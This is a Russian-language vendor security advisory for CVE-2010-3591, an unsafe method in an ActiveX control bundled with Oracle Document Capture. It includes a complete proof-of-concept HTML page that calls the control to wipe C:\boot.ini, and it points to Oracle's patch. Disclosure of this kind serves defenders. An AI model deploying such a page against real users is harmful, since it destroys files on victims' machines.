CVE-2010-3591

Вендор

Oracle

Продукт

Oracle Document Capture Release 10gR3

Тип уязвимости

Небезопасный метод

Reported

22.03.2010

Date of Public Advisory

24.01.2011

Автор

Дмитрий Евдокимов

Детальное описание

Oracle Document Capture содержит компонент ActiveX EMPOP3Lib (empop3.dll) Lib GUID: {F647CBE5-3C01-402A-B3F0-502A77054A24} , который содержит небезопасный метод "DownloadSingleMessageToFile", способный удалить любой файл в системе.

Class EasyMailPop3 
GUID: {F647CBE5-3C01-402A-B3F0-502A77054A24} 
Number of Interfaces: 1 
Default Interface: IPOP3Main 
RegKey Safe for Script: False 
RegkeySafe for Init: False 
KillBitSet: False 

Детали
******* 
Злоумышленник может создать HTML-страницу, которая вызовет уязвимую функцию "DownloadSingleMessageToFile" из ActiveX-компонента empop3.dll 

Пример
*********
<HTML> 
<HEAD> 
<TITLE>DSecRG</TITLE> 
</HEAD> 
<BODY> 

<OBJECT id='eds' classid='clsid:F647CBE5-3C01-402A-B3F0-502A77054A24'></OBJECT> 

<SCRIPT> 

function Exploit(){ 
eds.DownloadSingleMessageToFile(1,"C:\\boot.ini",1); 
} 
Exploit(); 

</SCRIPT> 
</BODY> 
</HTML> 

Решение 
**********
Информация была опубликована в CPU, Январь 2011.
Клиенты могут загрузить патчи CPU, следуя инструкциям по ссылке:
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html